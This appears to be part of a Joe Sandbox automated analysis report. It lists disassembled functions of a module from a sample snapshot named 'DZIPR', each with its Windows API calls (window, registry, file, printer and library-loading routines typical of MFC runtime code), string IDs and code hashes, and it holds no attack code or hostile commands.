                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FA52C57: GetWindowLongW.USER32(?,000000F0), ref: 6FA52C62
                                          • GetParent.USER32(?), ref: 6FA4FC05
                                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FA4FC28
                                          • GetWindowRect.USER32(?,?), ref: 6FA4FC42
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FA4FC58
                                          • CopyRect.USER32(?,?), ref: 6FA4FCA5
                                          • CopyRect.USER32(?,?), ref: 6FA4FCAF
                                          • GetWindowRect.USER32(00000000,?), ref: 6FA4FCB8
                                            • Part of subcall function 6FA4DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FA4DED6
                                          • CopyRect.USER32(?,?), ref: 6FA4FCD4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                                          • String ID: (
                                          • API String ID: 1385303425-3887548279
                                          • Opcode ID: fc1c716581296de5880642c843d538e6cf317b5f6af12ca6b5c2dde2fb63369e
                                          • Instruction ID: 43b26290cd29bb1c1cf494b18215941000235729716d6d14036393fd4a2616eb
                                          • Opcode Fuzzy Hash: fc1c716581296de5880642c843d538e6cf317b5f6af12ca6b5c2dde2fb63369e
                                          • Instruction Fuzzy Hash: FC516172904619AFDB00CFB8DD85AEEBBB9BF49314F095119E915F7180D734E941CB90
                                          Function 6FA5A11F Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FA6E928,0000000C,6FA5A25A,00000000,00000000), ref: 6FA5A131
                                          • __crt_waiting_on_module_handle.LIBCMT ref: 6FA5A13C
                                            • Part of subcall function 6FA55BCF: Sleep.KERNEL32(000003E8,00000000,?,6FA5A082,KERNEL32.DLL,?,6FA5A0CE), ref: 6FA55BDB
                                            • Part of subcall function 6FA55BCF: GetModuleHandleW.KERNEL32(6FA6C168,?,6FA5A082,KERNEL32.DLL,?,6FA5A0CE), ref: 6FA55BE4
                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FA5A165
                                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 6FA5A175
                                          • __lock.LIBCMT ref: 6FA5A197
                                          • InterlockedIncrement.KERNEL32(6FA48ADA), ref: 6FA5A1A4
                                          • __lock.LIBCMT ref: 6FA5A1B8
                                          • ___addlocaleref.LIBCMT ref: 6FA5A1D6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                          • API String ID: 1028249917-2843748187
                                          • Opcode ID: 60a1f5a776698b30c072e995dee929e084118288eb25f056d5939f7fafc5e784
                                          • Instruction ID: 24008840158fe247a4706aee2cce8cec2b896bf5818f8f78ec5227399d36d9f5
                                          • Opcode Fuzzy Hash: 60a1f5a776698b30c072e995dee929e084118288eb25f056d5939f7fafc5e784
                                          • Instruction Fuzzy Hash: 9711B1B1904B01DFDB209F39C904B5ABBE5BF45328F10851DD49A97290CB3CAAD1CF68
                                          Function 6FA484DA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FA48503
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA48520
                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FA4852D
                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FA4853A
                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FA48547
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 667068680-2424895508
                                          • Opcode ID: 70c15bb7cfb32baf4c02053861613813d56e2da5c2a43a11fbfee1a0b947cede
                                          • Instruction ID: 19eb841d7e62ae34a1eb1d670e7e8289a1e2a08c1ffbcca80ff3e6f11ebf7c59
                                          • Opcode Fuzzy Hash: 70c15bb7cfb32baf4c02053861613813d56e2da5c2a43a11fbfee1a0b947cede
                                          • Instruction Fuzzy Hash: CC1182B580D762AF8B109F65988AC06BFECAF57325309803FE55A97210DB3894D1CFD2
                                          Function 6FA4A59C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32,6FA4A6B6), ref: 6FA4A5AA
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA4A5CB
                                          • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FA4A5DD
                                          • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FA4A5EF
                                          • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FA4A601
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 417325364-2424895508
                                          • Opcode ID: 0208dddc760bd4054d5a8152fa48f1c1d3a2c12a274da1630a352197d2f8aed8
                                          • Instruction ID: 30de53e63e18871f9a8ca244c2f86dfd447dbce02c1788691820ce5e6402ef36
                                          • Opcode Fuzzy Hash: 0208dddc760bd4054d5a8152fa48f1c1d3a2c12a274da1630a352197d2f8aed8
                                          • Instruction Fuzzy Hash: 2FF0DA7D809B35AFCF515FA18805D167FEDAF17235702C41AA88093210E77880A6CFC1
                                          Function 6FA51861 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6FA51868
                                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA51877
                                          • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FA518D1
                                            • Part of subcall function 6FA50C2C: GetWindowRect.USER32(?,10000000), ref: 6FA50C56
                                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FA518F8
                                          • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FA51900
                                          • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FA51907
                                          • GlobalDeleteAtom.KERNEL32(?), ref: 6FA51911
                                          • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FA51965
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                                          • String ID: AfxOldWndProc423
                                          • API String ID: 2109165785-1060338832
                                          • Opcode ID: 4422d030fb0b099a90358b19b39c54efe798bbc596f3059260dd0c2a9171a356
                                          • Instruction ID: 95099d1e9e235df8cad0197b7dd0699db11e58ac7869bce3a8377ab68d111796
                                          • Opcode Fuzzy Hash: 4422d030fb0b099a90358b19b39c54efe798bbc596f3059260dd0c2a9171a356
                                          • Instruction Fuzzy Hash: 0A31367240421AABDF019FB4CE48EFF7BB8BF0A219F044119F611A6191C73999B1DBA1
                                          Function 6FA41C00 Relevance: 13.7, APIs: 9, Instructions: 159fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FA41BE9,?,?,?,?), ref: 6FA41C39
                                          • GetLastError.KERNEL32(?,?,?,?,?,6FA41BE9,?,?,?,?), ref: 6FA41C48
                                          • __aullrem.LIBCMT ref: 6FA41C60
                                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FA41CE8
                                          • _memset.LIBCMT ref: 6FA41CF5
                                          • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FA41BE9,?,?,?,?), ref: 6FA41D07
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                                          • String ID:
                                          • API String ID: 123228641-0
                                          • Opcode ID: bf1838314b0eaffeac2a482a0e24647b263f48fbee6fa4382de4d1ddeb730ecc
                                          • Instruction ID: f2ef585193cb25153452f223cf7425c922d4d1884d380a756ea2358288652816
                                          • Opcode Fuzzy Hash: bf1838314b0eaffeac2a482a0e24647b263f48fbee6fa4382de4d1ddeb730ecc
                                          • Instruction Fuzzy Hash: A3518FB1604701AFD741DF39CC40BABB7E8EF88764F044A2AF958D7240E774E9558BA2
                                          Function 6FA4BE0D Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6FA4BE14
                                          • EnterCriticalSection.KERNEL32(?,00000010,6FA4C0D0,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BE25
                                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BE43
                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4BE77
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BEE3
                                          • _memset.LIBCMT ref: 6FA4BF02
                                          • TlsSetValue.KERNEL32(?,00000000,?), ref: 6FA4BF13
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BF34
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                          • String ID:
                                          • API String ID: 1891723912-0
                                          • Opcode ID: d17410857eb28d991b64546e1888b93fd53eaf7ac417c340342ec60512b7c214
                                          • Instruction ID: 1390999cde8677614e35a8e7fd517eafbd0d8244288f4ecdf30000c0d51c58ca
                                          • Opcode Fuzzy Hash: d17410857eb28d991b64546e1888b93fd53eaf7ac417c340342ec60512b7c214
                                          • Instruction Fuzzy Hash: ED31AF70404705EFDB14DF24C985C6EBBB5FF41364B10C62AE62A9B690CB38E990CF90
                                          Function 6FA481FA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FA4815A: GetParent.USER32(?), ref: 6FA481AE
                                            • Part of subcall function 6FA4815A: GetLastActivePopup.USER32(?), ref: 6FA481BF
                                            • Part of subcall function 6FA4815A: IsWindowEnabled.USER32(?), ref: 6FA481D3
                                            • Part of subcall function 6FA4815A: EnableWindow.USER32(?,00000000), ref: 6FA481E6
                                          • EnableWindow.USER32(?,00000001), ref: 6FA48247
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 6FA4825B
                                          • GetCurrentProcessId.KERNEL32(?,?), ref: 6FA48265
                                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FA4827D
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FA482F9
                                          • EnableWindow.USER32(00000000,00000001), ref: 6FA48340
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                          • String ID: 0
                                          • API String ID: 1877664794-4108050209
                                          • Opcode ID: f382f762d6777eeaabc35779b44ea46fac48151fba7fda189ccf27a3d0e3005c
                                          • Instruction ID: 9427db0dcca9a8805f9cda4dc1cdb4f350c17bd33f3122282a506866913bfac9
                                          • Opcode Fuzzy Hash: f382f762d6777eeaabc35779b44ea46fac48151fba7fda189ccf27a3d0e3005c
                                          • Instruction Fuzzy Hash: 0A41A171A48B189BDB208F64DC88BDA77B8FF05710F180599E924E6180D774EAD08FD0
                                          Function 6FA4DE96 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FA4DED6
                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FA4DF00
                                          • GetSystemMetrics.USER32(00000000), ref: 6FA4DF17
                                          • GetSystemMetrics.USER32(00000001), ref: 6FA4DF1E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FA4DF49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                          • String ID: B$DISPLAY
                                          • API String ID: 381819527-3316187204
                                          • Opcode ID: b3008ebdc860225826ae84c03d9175c501ef6555e45abc494cda2a2173f1d2ef
                                          • Instruction ID: 19e567c29778a4f68ce70c95778b7615af547de9033699a8513c8231529e6fc1
                                          • Opcode Fuzzy Hash: b3008ebdc860225826ae84c03d9175c501ef6555e45abc494cda2a2173f1d2ef
                                          • Instruction Fuzzy Hash: 7121D671544720EBDF108F258C84B5B7BAEFF46B60F048516FD189B1C1D6B4E881CBA1
                                          Function 6FA488C8 Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalLock.KERNEL32(?), ref: 6FA488E7
                                          • lstrcmpW.KERNEL32(00000000,?), ref: 6FA488F4
                                          • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6FA48906
                                          • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FA48926
                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FA4892E
                                          • GlobalLock.KERNEL32(00000000), ref: 6FA48938
                                          • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6FA48945
                                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6FA4895D
                                            • Part of subcall function 6FA4DAD1: GlobalFlags.KERNEL32(?), ref: 6FA4DAE0
                                            • Part of subcall function 6FA4DAD1: GlobalUnlock.KERNEL32(?), ref: 6FA4DAF2
                                            • Part of subcall function 6FA4DAD1: GlobalFree.KERNEL32(?), ref: 6FA4DAFD
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                          • String ID:
                                          • API String ID: 168474834-0
                                          • Opcode ID: 5673b8fd631dfdc1b1c11819b0a0493b80097421205a43b6b5f031ba6237f727
                                          • Instruction ID: e1059e4067e5b495a38399df6d181632c35394671ff13fc5c6c31ab54f13a47d
                                          • Opcode Fuzzy Hash: 5673b8fd631dfdc1b1c11819b0a0493b80097421205a43b6b5f031ba6237f727
                                          • Instruction Fuzzy Hash: 80119D75504A04BFCF115BA5CD48CAF7BAEFF85B057004019FA11D2061C739D991D760
                                          Function 6FA4CD66 Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemMetrics.USER32(0000000B), ref: 6FA4CD75
                                          • GetSystemMetrics.USER32(0000000C), ref: 6FA4CD7C
                                          • GetSystemMetrics.USER32(00000002), ref: 6FA4CD83
                                          • GetSystemMetrics.USER32(00000003), ref: 6FA4CD8D
                                          • GetDC.USER32(00000000), ref: 6FA4CD97
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 6FA4CDA8
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FA4CDB0
                                          • ReleaseDC.USER32(00000000,00000000), ref: 6FA4CDB8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1151147025-0
                                          • Opcode ID: e8fe2f5804844086531afe0728e2c618fc974710644c55a426d3b178cf864768
                                          • Instruction ID: 971fb6fc24a1625af788fa488c48edb65c2854a58208e0dc7e8020ba7a77e8b0
                                          • Opcode Fuzzy Hash: e8fe2f5804844086531afe0728e2c618fc974710644c55a426d3b178cf864768
                                          • Instruction Fuzzy Hash: 93F06DB1E40B24BAEB105B728C49F267FA8EB42731F008516E7048B2C0DAB598228FD0
                                          Function 6FA5020C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 6FA5029B
                                          • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FA502C4
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FA502D6
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FA502E7
                                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FA50303
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend_memset
                                          • String ID: ,
                                          • API String ID: 2997958587-3772416878
                                          • Opcode ID: 4106cfdf04d0e805316fdac51ac94c6a0376b020c1608c43020dfa049a1e7192
                                          • Instruction ID: 390502206429d8fa9973eccd472101927d76972b330bbd2778e033843a598e59
                                          • Opcode Fuzzy Hash: 4106cfdf04d0e805316fdac51ac94c6a0376b020c1608c43020dfa049a1e7192
                                          • Instruction Fuzzy Hash: F8312670200712AFDB109FB4C984A5DBBF8BF49328F09522DE256DB691DB38F490CB50
                                          Function 6FA4A200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FA4A20A
                                          • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FA4A2F0
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FA4A30D
                                          • RegCloseKey.ADVAPI32(?), ref: 6FA4A32D
                                          • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FA4A348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                          • String ID: Software\
                                          • API String ID: 1666054129-964853688
                                          • Opcode ID: ec463f5e295dc7b761702e5cf4ba8d1fc1334bf5c1cec4b55e085f3dbabbbac4
                                          • Instruction ID: 1b1d71cd0037977bf0a89ffe8a60319298ea3a87358d7c2c2f5656550de06aac
                                          • Opcode Fuzzy Hash: ec463f5e295dc7b761702e5cf4ba8d1fc1334bf5c1cec4b55e085f3dbabbbac4
                                          • Instruction Fuzzy Hash: C6417531901618ABCB21DFA4DD48EEDB7B9AF49314F1406D5E115E2190D7389BD0DF50
                                          Function 6FA4A082 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_catch_GS.LIBCMT ref: 6FA4A08C
